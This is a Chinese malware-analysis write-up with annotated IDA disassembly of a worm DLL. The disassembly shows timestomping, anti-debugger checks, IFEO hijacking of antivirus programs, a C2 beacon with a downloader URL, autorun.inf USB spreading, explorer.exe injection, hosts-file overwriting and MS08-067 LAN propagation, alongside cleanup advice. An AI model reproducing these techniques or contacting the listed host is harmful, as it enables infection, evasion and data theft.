病毒行为描述：释放文件并把释放文件的时间戳改成系统文件（svchost.exe）的时间戳（反取证）、检测调试/脱壳工具、通过映像劫持（IFEO）让杀毒软件无法启动、启用 SeSecurityPrivilege、收集 MAC/系统版本向 C2 上报并下载文件、利用 ARP 攻击在局域网传播（本文片段只见到用 SendARP 取本机 MAC 的部分，ARP 欺骗代码未列出）、攻击没有修补 MS08-067 漏洞的 Windows 系统、利用 U 盘 autorun.inf 自动运行传播、向 explorer.exe 注入 appwinproc.dll 以关闭安全软件、覆盖 hosts 文件等。

代码（以下为 IDA 反汇编片段；主模块是加载基址 0x71000000 的 DLL，入口为 DllEntryPoint；第 15 节是另一模块 appwinproc.dll，基址 0x10000000。各片段均截自函数中间，只展示关键调用）:

1、比较当前进程是不是 svchost.exe（调用 sub_7100148D 把当前进程名与 "svchost.exe" 比较；紧接其后的 jz 决定是否走下面的释放驱动分支，具体哪种比较结果触发释放取决于 sub_7100148D 的返回约定，片段中未给出）


.text:71001394                 lea     eax, [ebp+eax+String]
.text:7100139B                 push    offset Data     ; "svchost.exe"
.text:710013A0                 push    eax             ; lpString
.text:710013A1                 call    sub_7100148D    ; 比较当前进程是不是svchost.exe


2、释放驱动（CreateFileA 的包装调用，分析者标注为"驱动"；释放的文件名和内容来自片段之外。注意上一步的 jz 跳过的正是这一段：只有比较结果非零时才释放并改时间）


.text:710013AB                 jz      short loc_710013BA
.text:710013AD                 call    CreateFileA_0   ; 驱动
.text:710013B2                 push    esi

3、将释放文件的时间修改为 svchost.exe 的时间（sub_71002501，典型的 timestomping 手法，目的是让新释放的文件在按时间排序或做时间线取证时与系统文件混在一起；具体改的是哪几个时间戳需看 sub_71002501 内部）


.text:710013B3                 call    sub_71002501    ; svchost.exe时间
.text:710013B8                 jmp     short loc_710013C9
.text:710013BA ; ---------------------------------------------------------------------------

4、创建线程（CreateThread 以 CreateThread_1 为线程函数，线程属性、栈大小、参数、创建标志全部压入 esi——此处 esi 推测为 0，即默认属性、默认栈、无参数、立即运行；上面两条分支最终都汇合到这里）

.text:710013BA loc_710013BA:                           ; CODE XREF: DllEntryPoint+65j
.text:710013BA                 push    esi             ; dwCreationFlags
.text:710013BB                 push    esi             ; lpParameter
.text:710013BC                 push    offset CreateThread_1 ; lpStartAddress
.text:710013C1                 push    esi             ; dwStackSize
.text:710013C2                 push    esi             ; lpThreadAttributes
.text:710013C3                 call    ds:CreateThread

5、遍历进程——实为反调试/反分析检查：逐个枚举进程（PROCESSENTRY32.szExeFile）并与 "OllyDbg.exe"、"OllyICE.exe"、"PEditor.exe"、"LordPE.exe"、"C32Asm.exe"、"ImportREC.exe" 比较，命中任一即跳到 loc_7100114D（命中后的处理在片段外，通常是退出或改变行为）。动态分析时应把调试器/分析工具改名后再运行。

.text:710010A4                 push    eax             ; int
.text:710010A5                 push    offset aOllydbg_exe ; "OllyDbg.exe"
.text:710010AA                 call    sub_7100148D
.text:710010AF                 test    eax, eax
.text:710010B1                 pop     ecx
.text:710010B2                 pop     ecx
.text:710010B3                 jz      loc_7100114D
.text:710010B9                 lea     eax, [ebp+78h+pe.szExeFile]
.text:710010BF                 push    eax             ; int
.text:710010C0                 push    offset aOllyice_exe ; "OllyICE.exe"
.text:710010C5                 call    sub_7100148D
.text:710010CA                 test    eax, eax
.text:710010CC                 pop     ecx
.text:710010CD                 pop     ecx
.text:710010CE                 jz      short loc_7100114D
.text:710010D0                 lea     eax, [ebp+78h+pe.szExeFile]
.text:710010D6                 push    eax             ; int
.text:710010D7                 push    offset aPeditor_exe ; "PEditor.exe"
.text:710010DC                 call    sub_7100148D
.text:710010E1                 test    eax, eax
.text:710010E3                 pop     ecx
.text:710010E4                 pop     ecx
.text:710010E5                 jz      short loc_7100114D
.text:710010E7                 lea     eax, [ebp+78h+pe.szExeFile]
.text:710010ED                 push    eax             ; int
.text:710010EE                 push    offset aLordpe_exe ; "LordPE.exe"
.text:710010F3                 call    sub_7100148D
.text:710010F8                 test    eax, eax
.text:710010FA                 pop     ecx
.text:710010FB                 pop     ecx
.text:710010FC                 jz      short loc_7100114D
.text:710010FE                 lea     eax, [ebp+78h+pe.szExeFile]
.text:71001104                 push    eax             ; int
.text:71001105                 push    offset aC32asm_exe ; "C32Asm.exe"
.text:7100110A                 call    sub_7100148D
.text:7100110F                 test    eax, eax
.text:71001111                 pop     ecx
.text:71001112                 pop     ecx
.text:71001113                 jz      short loc_7100114D
.text:71001115                 lea     eax, [ebp+78h+pe.szExeFile]
.text:7100111B                 push    eax             ; int
.text:7100111C                 push    offset aImportrec_exe ; "ImportREC.exe"
.text:71001121                 call    sub_7100148D
.text:71001126                 test    eax, eax
.text:71001128                 pop     ecx
.text:71001129                 pop     ecx


6、映像劫持（IFEO）：打开 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options，先为 "avp.exe"（卡巴斯基）创建子键并写入 Debugger = "svchost.exe"（REG_SZ，cbData 0Ch 含结尾 0），然后循环遍历 lpSubKey 指向的进程名表，对每个名字重复同样操作。效果是这些安全软件一启动就被替换成运行 svchost.exe（原命令行作为参数附在其后），从而无法运行。片段中还取得 kernel32!Sleep 的地址存入 var_4，其用途在片段之外。检测/清理时应监控并删除 IFEO\*\Debugger 下指向 svchost.exe 的值。


.text:71001C4B                 push    esi             ; ulOptions
.text:71001C4C                 push    offset SubKey   ; SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution  Options
.text:71001C51                 push    80000002h       ; hKey
.text:71001C56                 call    ds:RegOpenKeyExA
.text:71001C5C                 push    offset aSleep   ; "Sleep"
.text:71001C61                 push    offset LibFileName ; "kernel32.dll"
.text:71001C66                 call    ds:LoadLibraryW
.text:71001C6C                 push    eax             ; hModule
.text:71001C6D                 call    ds:GetProcAddress
.text:71001C73                 mov     ebx, ds:RegCreateKeyExA
.text:71001C79                 mov     ebp, ds:RegSetValueExA
.text:71001C7F                 mov     [esp+20h+var_4], eax
.text:71001C83
.text:71001C83 loc_71001C83:                           ; CODE XREF: IFEO+E4j
.text:71001C83                 push    esi             ; lpdwDisposition
.text:71001C84                 lea     eax, [esp+24h+phkResult]
.text:71001C88                 push    eax             ; phkResult
.text:71001C89                 push    esi             ; lpSecurityAttributes
.text:71001C8A                 push    edi             ; samDesired
.text:71001C8B                 push    esi             ; dwOptions
.text:71001C8C                 push    esi             ; lpClass
.text:71001C8D                 push    esi             ; Reserved
.text:71001C8E                 push    offset aAvp_exe ; "avp.exe"
.text:71001C93                 push    [esp+40h+hKey]  ; hKey
.text:71001C97                 mov     [esp+44h+phkResult], esi
.text:71001C9B                 call    ebx ; RegCreateKeyExA
.text:71001C9D                 push    0Ch             ; cbData
.text:71001C9F                 push    offset Data     ; "svchost.exe"
.text:71001CA4                 push    1               ; dwType
.text:71001CA6                 push    esi             ; Reserved
.text:71001CA7                 push    offset ValueName ; "Debugger"
.text:71001CAC                 push    [esp+34h+phkResult] ; hKey
.text:71001CB0                 call    ebp ; RegSetValueExA
.text:71001CB2                 push    [esp+20h+phkResult] ; hKey
.text:71001CB6                 call    ds:RegCloseKey
.text:71001CBC                 mov     eax, lpSubKey
.text:71001CC1                 cmp     eax, esi
.text:71001CC3                 jz      short loc_71001D0D
.text:71001CC5                 mov     [esp+20h+var_8], offset lpSubKey
.text:71001CCD
.text:71001CCD loc_71001CCD:                           ; CODE XREF: IFEO+D9j
.text:71001CCD                 push    esi             ; lpdwDisposition
.text:71001CCE                 lea     ecx, [esp+24h+phkResult]
.text:71001CD2                 push    ecx             ; phkResult
.text:71001CD3                 push    esi             ; lpSecurityAttributes
.text:71001CD4                 push    edi             ; samDesired
.text:71001CD5                 push    esi             ; dwOptions
.text:71001CD6                 push    esi             ; lpClass
.text:71001CD7                 push    esi             ; Reserved
.text:71001CD8                 push    eax             ; lpSubKey
.text:71001CD9                 push    [esp+40h+hKey]  ; hKey
.text:71001CDD                 call    ebx ; RegCreateKeyExA
.text:71001CDF                 push    0Ch             ; cbData
.text:71001CE1                 push    offset Data     ; "svchost.exe"
.text:71001CE6                 push    1               ; dwType
.text:71001CE8                 push    esi             ; Reserved
.text:71001CE9                 push    offset ValueName ; "Debugger"
.text:71001CEE                 push    [esp+34h+phkResult] ; hKey
.text:71001CF2                 call    ebp ; RegSetValueExA
.text:71001CF4                 push    [esp+20h+phkResult] ; hKey
.text:71001CF8                 call    ds:RegCloseKey
    
7、提权（tiquan 以 "SeSecurityPrivilege" 为参数，推测是 AdjustTokenPrivileges 的封装。注意这只是启用当前令牌中已有的特权（SeSecurityPrivilege 对应 SACL/审计设置的访问），并非真正的权限提升；令牌中没有该特权时调用会失败）

.text:71001B89                 mov     ebp, offset aSesecuritypriv ; "SeSecurityPrivilege"
.text:71001B8E                 push    ebp             ; lpName
.text:71001B8F                 call    tiquan          ; 提权
.text:71001B94                 pop     ecx


8、收集机器信息并上报：通过 GetVersionExA 取系统版本（"受影响版本"），通过 SendARP 取本机 MAC 并格式化为 "%.2X-%.2X-%.2X-%.2X-%.2X-%.2X"；用 sub_710013D1 解密存放在 unk_710080A0（长度 dword_71008120）的 C2 地址；从 Urlmon.dll 动态解析 URLDownloadToFileA，拼接 "%s?mac=%s&os=%s&ver=2.5.1130&temp=%d&ke..." 形式的上报 URL（版本号 2.5.1130，temp 为 GetTickCount），并在 %TEMP% 下生成 "<tick>.txt" 作为下载目标文件名；实际的 URLDownloadToFileA 调用在片段之后。


.text:71003ABB                 push    80h
.text:71003AC0                 push    eax             ; lpString1
.text:71003AC1                 call    GetVersionExA_0 ; 受影响版本


.text:71003AD4                 push    eax
.text:71003AD5                 call    sub_710038DB    ; SendARP
.text:71003ADA                 push    1Fh


.text:71003B0F                 lea     eax, [ebp+74h+var_8C]
.text:71003B12                 push    offset a_2x_2x_2x_2x_2 ; "%.2X-%.2X-%.2X-%.2X-%.2X-%.2X"
.text:71003B17                 push    eax             ; LPSTR
.text:71003B18                 call    ebx ; wsprintfA
.text:71003B1A                 mov     [ebp+74h+var_314], 0
.text:71003B21                 push    40h
.text:71003B23                 xor     eax, eax
.text:71003B25                 pop     ecx
.text:71003B26                 lea     edi, [ebp+74h+var_313]
.text:71003B2C                 rep stosd
.text:71003B2E                 stosw
.text:71003B30                 stosb
.text:71003B31                 mov     eax, dword_71008120
.text:71003B36                 mov     ecx, eax
.text:71003B38                 mov     edx, ecx
.text:71003B3A                 shr     ecx, 2
.text:71003B3D                 mov     esi, offset unk_710080A0
.text:71003B42                 lea     edi, [ebp+74h+var_314]
.text:71003B48                 rep movsd
.text:71003B4A                 push    eax
.text:71003B4B                 mov     ecx, edx
.text:71003B4D                 lea     eax, [ebp+74h+var_314]
.text:71003B53                 and     ecx, 3
.text:71003B56                 push    eax
.text:71003B57                 rep movsb
.text:71003B59                 call    sub_710013D1
.text:71003B5E                 add     esp, 34h
.text:71003B61                 push    offset aUrldownloadtof ; "URLDownloadToFileA"
.text:71003B66                 push    offset aUrlmon_dll ; "Urlmon.dll"
.text:71003B6B                 call    ds:LoadLibraryW
.text:71003B71                 push    eax             ; hModule
.text:71003B72                 call    ds:GetProcAddress
.text:71003B78                 test    eax, eax
.text:71003B7A                 mov     [ebp+74h+var_8], eax
.text:71003B7D                 jz      loc_71003C35
.text:71003B83                 mov     esi, ds:GetTickCount
.text:71003B89                 push    7Fh
.text:71003B8B                 mov     [ebp+74h+var_514], 0
.text:71003B92                 xor     eax, eax
.text:71003B94                 pop     ecx
.text:71003B95                 lea     edi, [ebp+74h+var_513]
.text:71003B9B                 rep stosd
.text:71003B9D                 stosw
.text:71003B9F                 stosb
.text:71003BA0                 call    esi ; GetTickCount
.text:71003BA2                 mov     edi, eax
.text:71003BA4                 lea     eax, [ebp+74h+var_8C]
.text:71003BA7                 push    edi
.text:71003BA8                 push    eax
.text:71003BA9                 call    sub_710038A9
.text:71003BAE                 push    eax
.text:71003BAF                 push    edi
.text:71003BB0                 lea     eax, [ebp+74h+String1]
.text:71003BB6                 push    eax
.text:71003BB7                 lea     eax, [ebp+74h+var_8C]
.text:71003BBA                 push    eax
.text:71003BBB                 lea     eax, [ebp+74h+var_314]
.text:71003BC1                 push    eax
.text:71003BC2                 lea     eax, [ebp+74h+var_514]
.text:71003BC8                 push    offset aS?macSOsSVer2_ ; "%s?mac=%s&os=%s&ver=2.5.1130&temp=%d&ke"...
.text:71003BCD                 push    eax             ; LPSTR
.text:71003BCE                 call    ebx ; wsprintfA
.text:71003BD0                 add     esp, 24h
.text:71003BD3                 push    40h
.text:71003BD5                 pop     ecx
.text:71003BD6                 xor     eax, eax
.text:71003BD8                 mov     [ebp+74h+Buffer], 0
.text:71003BDF                 lea     edi, [ebp+74h+var_20F]
.text:71003BE5                 rep stosd
.text:71003BE7                 stosw
.text:71003BE9                 stosb
.text:71003BEA                 lea     eax, [ebp+74h+Buffer]
.text:71003BF0                 push    eax             ; lpBuffer
.text:71003BF1                 push    104h            ; nBufferLength
.text:71003BF6                 call    ds:GetTempPathA
.text:71003BFC                 call    esi ; GetTickCount
.text:71003BFE                 push    eax
.text:71003BFF                 lea     eax, [ebp+74h+Buffer]
.text:71003C05                 push    eax
.text:71003C06                 push    offset aSD_txt  ; "%s%d.txt"
.text:71003C0B                 push    eax             ; LPSTR
.text:71003C0C                 call    ebx ; wsprintfA


9、下载者：http://biao.djdj4455.cn/number/list.txt（URL 以加密形式存放在 asc_7100801C，运行时由 sub_710013D1 解密——与第 8 节解密 C2 地址的是同一例程；该域名/URL 可作为 IOC 使用，分析时勿直接访问）


.text:710022EB                 push    dword_7100809C
.text:710022F1                 mov     esi, offset asc_7100801C ; "!构"
.text:710022F6                 push    esi
.text:710022F7                 call    sub_710013D1    ; 解密call
.text:710022F7                                         ; http://biao.djdj4455.cn/number/list.txt
.text:710022FC                 pop     ecx


10、Autorun（U 盘/移动介质传播）：GetLogicalDriveStringsA 枚举盘符，跳过 A:\ 和 B:\，用 GetDriveTypeA 的结果与 dword_7100800C/dword_71008010 两个常量比较（值在片段外，推测为可移动盘/固定盘类型），对符合的盘先对 "<盘符>autorun.inf" 调 SetFileAttributes(6) + RemoveDirectoryA——这是为了删掉用户用"autorun.inf 文件夹"做的免疫——再以隐藏+系统属性（6）创建并写入 "[autorun]\r\nshell\\open\\command=rundll32 system.dll,explore\r\nshell\\explore\\command=rundll32 system.dll,explore"，随后把 "<盘符>system.dll" 路径交给 sub_71003E6E（推测为释放 DLL 本体），最后 Sleep 10 秒（2710h）后循环。

text:71003F07                 push    edi
.text:71003F08                 mov     ebp, offset aExplore ; "explore"
.text:71003F0D                 mov     esi, offset aSystem_dll ; "system.dll"
.text:71003F12
.text:71003F12 loc_71003F12:                           ; CODE XREF: autorun+1CAj
.text:71003F12                 lea     eax, [esp+734h+Buffer]
.text:71003F19                 push    eax             ; lpBuffer
.text:71003F1A                 push    104h            ; nBufferLength
.text:71003F1F                 call    ds:GetLogicalDriveStringsA
.text:71003F25                 lea     eax, [esp+734h+Buffer]
.text:71003F2C                 mov     [esp+734h+lpString], eax
.text:71003F30                 lea     eax, [esp+734h+lpString]
.text:71003F34                 push    eax             ; int
.text:71003F35                 lea     eax, [esp+738h+Buffer]
.text:71003F3C                 push    eax             ; lpString
.text:71003F3D                 call    sub_71003E11
.text:71003F42                 mov     edi, eax
.text:71003F44                 test    edi, edi
.text:71003F46                 pop     ecx
.text:71003F47                 pop     ecx
.text:71003F48                 mov     [esp+734h+lpString2], edi
.text:71003F4C                 jz      loc_710040BD
.text:71003F52                 jmp     short loc_71003F58
.text:71003F54 ; ---------------------------------------------------------------------------
.text:71003F54
.text:71003F54 loc_71003F54:                           ; CODE XREF: autorun+1B9j
.text:71003F54                 mov     edi, [esp+734h+lpString2]
.text:71003F58
.text:71003F58 loc_71003F58:                           ; CODE XREF: autorun+54j
.text:71003F58                 push    edi             ; lpRootPathName
.text:71003F59                 call    ds:GetDriveTypeA
.text:71003F5F                 mov     ebx, ds:lstrcmpiA
.text:71003F65                 push    offset aA       ; "A:\\"
.text:71003F6A                 push    edi             ; lpString1
.text:71003F6B                 mov     [esp+73Ch+var_71C], eax
.text:71003F6F                 call    ebx ; lstrcmpiA
.text:71003F71                 test    eax, eax
.text:71003F73                 jz      loc_710040A1
.text:71003F79                 push    offset aB       ; "B:\\"
.text:71003F7E                 push    edi             ; lpString1
.text:71003F7F                 call    ebx ; lstrcmpiA
.text:71003F81                 test    eax, eax
.text:71003F83                 jz      loc_710040A1
.text:71003F89                 mov     eax, [esp+734h+var_71C]
.text:71003F8D                 cmp     eax, dword_7100800C
.text:71003F93                 jz      short loc_71003FA1
.text:71003F95                 cmp     eax, dword_71008010
.text:71003F9B                 jnz     loc_710040A1
.text:71003FA1
.text:71003FA1 loc_71003FA1:                           ; CODE XREF: autorun+95j
.text:71003FA1                 push    offset aAutorun ; "autorun"
.text:71003FA6                 push    edi
.text:71003FA7                 lea     eax, [esp+73Ch+FileName]
.text:71003FAB                 push    offset aSS_inf  ; "%s%s.inf"
.text:71003FB0                 push    eax             ; LPSTR
.text:71003FB1                 call    ds:wsprintfA
.text:71003FB7                 add     esp, 10h
.text:71003FBA                 push    6               ; dwFileAttributes
.text:71003FBC                 lea     eax, [esp+738h+FileName]
.text:71003FC0                 push    eax             ; lpFileName
.text:71003FC1                 call    ds:SetFileAttributesA
.text:71003FC7                 lea     eax, [esp+734h+FileName]
.text:71003FCB                 push    eax             ; lpPathName
.text:71003FCC                 call    ds:RemoveDirectoryA
.text:71003FD2                 push    0               ; hTemplateFile
.text:71003FD4                 push    6               ; dwFlagsAndAttributes
.text:71003FD6                 push    4               ; dwCreationDisposition
.text:71003FD8                 push    0               ; lpSecurityAttributes
.text:71003FDA                 push    7               ; dwShareMode
.text:71003FDC                 push    0C0000000h      ; dwDesiredAccess
.text:71003FE1                 lea     eax, [esp+74Ch+FileName]
.text:71003FE5                 push    eax             ; lpFileName
.text:71003FE6                 call    ds:CreateFileA
.text:71003FEC                 mov     ebx, eax
.text:71003FEE                 xor     eax, eax
.text:71003FF0                 mov     [esp+734h+String], 0
.text:71003FF8                 mov     ecx, 0FFh
.text:71003FFD                 lea     edi, [esp+734h+var_3FF]
.text:71004004                 rep stosd
.text:71004006                 push    ebp
.text:71004007                 push    esi
.text:71004008                 stosw
.text:7100400A                 stosb
.text:7100400B                 mov     eax, offset aCommandRundll3 ; "command=rundll32"
.text:71004010                 push    eax
.text:71004011                 push    ebp
.text:71004012                 mov     ecx, offset aShell ; "shell"
.text:71004017                 push    ecx
.text:71004018                 push    ebp
.text:71004019                 push    esi
.text:7100401A                 push    eax
.text:7100401B                 push    ecx
.text:7100401C                 push    offset aAutorun ; "autorun"
.text:71004021                 lea     eax, [esp+75Ch+String]
.text:71004028                 push    offset aSSOpenSSSSSSSS ; "[%s]\r\n%s\\open\\%s %s,%s\r\n%s\\%s\\%s %s,%s"
.text:7100402D                 push    eax             ; LPSTR
.text:7100402E                 call    ds:wsprintfA
.text:71004034                 add     esp, 30h
.text:71004037                 lea     eax, [esp+734h+String]
.text:7100403E                 push    eax             ; lpString
.text:7100403F                 call    ds:lstrlenA
.text:71004045                 push    0               ; lpOverlapped
.text:71004047                 lea     ecx, [esp+738h+NumberOfBytesWritten]
.text:7100404B                 push    ecx             ; lpNumberOfBytesWritten
.text:7100404C                 inc     eax
.text:7100404D                 push    eax             ; nNumberOfBytesToWrite
.text:7100404E                 lea     eax, [esp+740h+String]
.text:71004055                 push    eax             ; lpBuffer
.text:71004056                 push    ebx             ; hFile
.text:71004057                 call    ds:WriteFile
.text:7100405D                 push    ebx             ; hFile
.text:7100405E                 call    ds:SetEndOfFile
.text:71004064                 push    ebx             ; hFile
.text:71004065                 call    ds:FlushFileBuffers
.text:7100406B                 push    ebx             ; hObject
.text:7100406C                 call    ds:CloseHandle
.text:71004072                 push    [esp+734h+lpString2] ; lpString2
.text:71004076                 lea     eax, [esp+738h+String1]
.text:7100407D                 push    eax             ; lpString1
.text:7100407E                 call    ds:lstrcpyA
.text:71004084                 push    esi             ; lpString2
.text:71004085                 lea     eax, [esp+738h+String1]
.text:7100408C                 push    eax             ; lpString1
.text:7100408D                 call    ds:lstrcatA
.text:71004093                 lea     eax, [esp+734h+String1]
.text:7100409A                 push    eax             ; lpFileName
.text:7100409B                 call    sub_71003E6E
.text:710040A0                 pop     ecx
.text:710040A1
.text:710040A1 loc_710040A1:                           ; CODE XREF: autorun+75j
.text:710040A1                                         ; autorun+85j ...
.text:710040A1                 lea     eax, [esp+734h+lpString]
.text:710040A5                 push    eax             ; int
.text:710040A6                 push    [esp+738h+lpString] ; lpString
.text:710040AA                 call    sub_71003E11
.text:710040AF                 test    eax, eax
.text:710040B1                 pop     ecx
.text:710040B2                 pop     ecx
.text:710040B3                 mov     [esp+734h+lpString2], eax
.text:710040B7                 jnz     loc_71003F54
.text:710040BD
.text:710040BD loc_710040BD:                           ; CODE XREF: autorun+4Ej
.text:710040BD                 push    2710h           ; dwMilliseconds
.text:710040C2                 call    ds:Sleep


11、注入：拼出 %SystemRoot%\system32\appwinproc.dll 路径，用 sub_71003558 把自身 "RES" 类型资源（ID 0x69，IDA 误标为 nNumberOfBytesToWrite）写到该文件；然后循环（每次 Sleep 10 秒）查找 explorer.exe 的 PID 直到找到；以 0x10043A（PROCESS_CREATE_THREAD|VM_OPERATION|VM_READ|VM_WRITE|QUERY_INFORMATION|SYNCHRONIZE，即远程线程注入所需的权限组合）打开进程，调用 sub_71002474(hProcess, DLL 路径) 完成注入（推测为 CreateRemoteThread+LoadLibrary），再 WaitForSingleObject(hProcess, INFINITE) 等 explorer.exe 退出后跳回 loc_71003D69 重新注入。


.text:71003D8C                 call    ds:GetSystemDirectoryA
.text:71003D92                 push    offset aAppwinproc_dll ; "\\appwinproc.dll"
.text:71003D97                 lea     eax, [ebp+Buffer]
.text:71003D9D                 push    eax             ; lpString1
.text:71003D9E                 call    ds:lstrcatA
.text:71003DA4                 lea     eax, [ebp+Buffer]
.text:71003DAA                 push    eax             ; lpFileName
.text:71003DAB                 push    69h             ; nNumberOfBytesToWrite
.text:71003DAD                 push    offset Type     ; "RES"
.text:71003DB2                 push    hModule         ; hModule
.text:71003DB8                 call    sub_71003558
.text:71003DBD                 add     esp, 10h
.text:71003DC0
.text:71003DC0 loc_71003DC0:                           ; CODE XREF: inject+7Dj
.text:71003DC0                 push    offset aExplorer_exe ; "explorer.exe"
.text:71003DC5                 call    sub_710014EE
.text:71003DCA                 mov     esi, eax
.text:71003DCC                 mov     [esp+110h+var_110], 2710h
.text:71003DD3                 call    ds:Sleep
.text:71003DD9                 test    esi, esi
.text:71003DDB                 jz      short loc_71003DC0
.text:71003DDD                 push    esi             ; dwProcessId
.text:71003DDE                 push    0               ; bInheritHandle
.text:71003DE0                 push    10043Ah         ; dwDesiredAccess
.text:71003DE5                 call    ds:OpenProcess
.text:71003DEB                 mov     esi, eax
.text:71003DED                 test    esi, esi
.text:71003DEF                 jz      loc_71003D69
.text:71003DF5                 lea     eax, [ebp+Buffer]
.text:71003DFB                 push    eax             ; lpBuffer
.text:71003DFC                 push    esi             ; hProcess
.text:71003DFD                 call    sub_71002474
.text:71003E02                 push    0FFFFFFFFh      ; dwMilliseconds
.text:71003E04                 push    esi             ; hHandle
.text:71003E05                 call    ds:WaitForSingleObject
.text:71003E0B                 jmp     loc_71003D69


12、修改 hosts 文件：把 %SystemRoot%\system32\drivers\etc\hosts 属性改为 NORMAL(80h)，以 GENERIC_WRITE/OPEN_ALWAYS 打开，SetFilePointer 回到文件开头，遍历 off_71008430 处以 0 结尾的域名指针表，逐条写入 "127.0.0.1 <域名>\r\n"，最后 SetEndOfFile 截断。注意这是从偏移 0 覆盖而不是追加，原 hosts 内容会丢失（表为空时文件会被清空），且每 30 秒（7530h）循环重写一次；清理时要先结束该线程再用干净模板重建 hosts。域名表内容在片段外，通常是安全厂商站点。

text:710040FD                 call    ds:GetSystemDirectoryA
.text:71004103                 push    offset aDriversEtcHost ; "\\drivers\\etc\\hosts"
.text:71004108                 lea     eax, [ebp+FileName]
.text:7100410E                 push    eax             ; lpString1
.text:7100410F                 call    ds:lstrcatA
.text:71004115                 mov     esi, 80h
.text:7100411A                 push    esi             ; dwFileAttributes
.text:7100411B                 lea     eax, [ebp+FileName]
.text:71004121                 push    eax             ; lpFileName
.text:71004122                 call    ds:SetFileAttributesA
.text:71004128                 push    ebx             ; hTemplateFile
.text:71004129                 push    esi             ; dwFlagsAndAttributes
.text:7100412A                 push    4               ; dwCreationDisposition
.text:7100412C                 push    ebx             ; lpSecurityAttributes
.text:7100412D                 push    1               ; dwShareMode
.text:7100412F                 push    40000000h       ; dwDesiredAccess
.text:71004134                 lea     eax, [ebp+FileName]
.text:7100413A                 push    eax             ; lpFileName
.text:7100413B                 call    ds:CreateFileA
.text:71004141                 mov     edi, eax
.text:71004143
.text:71004143 loc_71004143:                           ; CODE XREF: modifly_hosts+E0j
.text:71004143                 push    ebx             ; dwMoveMethod
.text:71004144                 push    ebx             ; lpDistanceToMoveHigh
.text:71004145                 push    ebx             ; lDistanceToMove
.text:71004146                 push    edi             ; hFile
.text:71004147                 call    ds:SetFilePointer
.text:7100414D                 mov     eax, off_71008430
.text:71004152                 cmp     eax, ebx
.text:71004154                 jz      short loc_7100419B
.text:71004156                 mov     esi, offset off_71008430
.text:7100415B
.text:7100415B loc_7100415B:                           ; CODE XREF: modifly_hosts+CCj
.text:7100415B                 push    eax
.text:7100415C                 lea     eax, [ebp+String]
.text:71004162                 push    offset a127_0_0_1S ; "127.0.0.1 %s\r\n"
.text:71004167                 push    eax             ; LPSTR
.text:71004168                 call    ds:wsprintfA
.text:7100416E                 add     esp, 0Ch
.text:71004171                 push    ebx             ; lpOverlapped
.text:71004172                 lea     eax, [ebp+NumberOfBytesWritten]
.text:71004175                 push    eax             ; lpNumberOfBytesWritten
.text:71004176                 lea     eax, [ebp+String]
.text:7100417C                 push    eax             ; lpString
.text:7100417D                 call    ds:lstrlenA
.text:71004183                 push    eax             ; nNumberOfBytesToWrite
.text:71004184                 lea     eax, [ebp+String]
.text:7100418A                 push    eax             ; lpBuffer
.text:7100418B                 push    edi             ; hFile
.text:7100418C                 call    ds:WriteFile
.text:71004192                 add     esi, 4
.text:71004195                 mov     eax, [esi]
.text:71004197                 cmp     eax, ebx
.text:71004199                 jnz     short loc_7100415B
.text:7100419B
.text:7100419B loc_7100419B:                           ; CODE XREF: modifly_hosts+87j
.text:7100419B                 push    edi             ; hFile
.text:7100419C                 call    ds:SetEndOfFile
.text:710041A2                 push    7530h           ; dwMilliseconds
.text:710041A7                 call    ds:Sleep


13、利用 MS08-067 漏洞在局域网传播：从 LoadLibraryA 加载的外部模块（名字在 [ebx+84h]）取 "Ms0867" 导出函数；对目标地址最后一个字节从 1 到 254（arg_0+3，即同一 /24 网段）逐个在临界区内调用该函数；返回非零时创建 TCP socket 连接目标的 4444 端口（115Ch），并 send [ebx] 处的命令字符串，失败则 closesocket。推测漏洞利用的 payload 在目标上开了 4444 端口的绑定 shell，这里再向其发送下载/执行命令；具体 payload 在片段外。


.text:71001E12                 push    offset aMs0867  ; "Ms0867"
.text:71001E17                 lea     eax, [ebx+84h]
.text:71001E1D                 push    eax             ; lpLibFileName
.text:71001E1E                 mov     byte ptr [ebp+arg_0+3], 1
.text:71001E22                 call    ds:LoadLibraryA
.text:71001E28                 push    eax             ; hModule
.text:71001E29                 call    ds:GetProcAddress
.text:71001E2F                 test    eax, eax
.text:71001E31                 mov     dword ptr [ebp+name.sa_data+2], eax
.text:71001E34                 jz      short loc_71001EB0
.text:71001E36                 push    esi
.text:71001E37                 push    edi
.text:71001E38                 mov     esi, offset CriticalSection
.text:71001E3D
.text:71001E3D loc_71001E3D:                           ; CODE XREF: sub_71001DFC+B0j
.text:71001E3D                 push    esi             ; lpCriticalSection
.text:71001E3E                 call    ds:EnterCriticalSection
.text:71001E44                 lea     eax, [ebx+4]
.text:71001E47                 push    eax
.text:71001E48                 call    dword ptr [ebp+name.sa_data+2]
.text:71001E4B                 push    esi             ; lpCriticalSection
.text:71001E4C                 mov     edi, eax
.text:71001E4E                 call    ds:LeaveCriticalSection
.text:71001E54                 test    edi, edi
.text:71001E56                 jz      short loc_71001EA5
.text:71001E58                 push    0               ; protocol
.text:71001E5A                 push    1               ; type
.text:71001E5C                 push    2               ; af
.text:71001E5E                 call    socket
.text:71001E63                 push    115Ch           ; hostshort
.text:71001E68                 mov     dword ptr [ebp+name.sa_data+6], eax
.text:71001E6B                 call    htons
.text:71001E70                 push    10h             ; namelen
.text:71001E72                 lea     eax, [ebp+name]
.text:71001E75                 push    eax             ; name
.text:71001E76                 push    dword ptr [ebp+name.sa_data+6] ; s
.text:71001E79                 call    connect
.text:71001E7E                 cmp     eax, 0FFFFFFFFh
.text:71001E81                 jz      short loc_71001E9D
.text:71001E83                 mov     edi, [ebx]
.text:71001E85                 push    edi             ; lpString
.text:71001E86                 call    ds:lstrlenA
.text:71001E8C                 push    0               ; flags
.text:71001E8E                 push    eax             ; len
.text:71001E8F                 push    edi             ; buf
.text:71001E90                 push    dword ptr [ebp+name.sa_data+6] ; s
.text:71001E93                 call    send
.text:71001E98                 cmp     eax, 0FFFFFFFFh
.text:71001E9B                 jnz     short loc_71001EA5
.text:71001E9D
.text:71001E9D loc_71001E9D:                           ; CODE XREF: sub_71001DFC+85j
.text:71001E9D                 push    dword ptr [ebp+name.sa_data+6] ; s
.text:71001EA0                 call    closesocket
.text:71001EA5
.text:71001EA5 loc_71001EA5:                           ; CODE XREF: sub_71001DFC+5Aj
.text:71001EA5                                         ; sub_71001DFC+9Fj
.text:71001EA5                 inc     byte ptr [ebp+arg_0+3]
.text:71001EA8                 cmp     byte ptr [ebp+arg_0+3], 0FEh
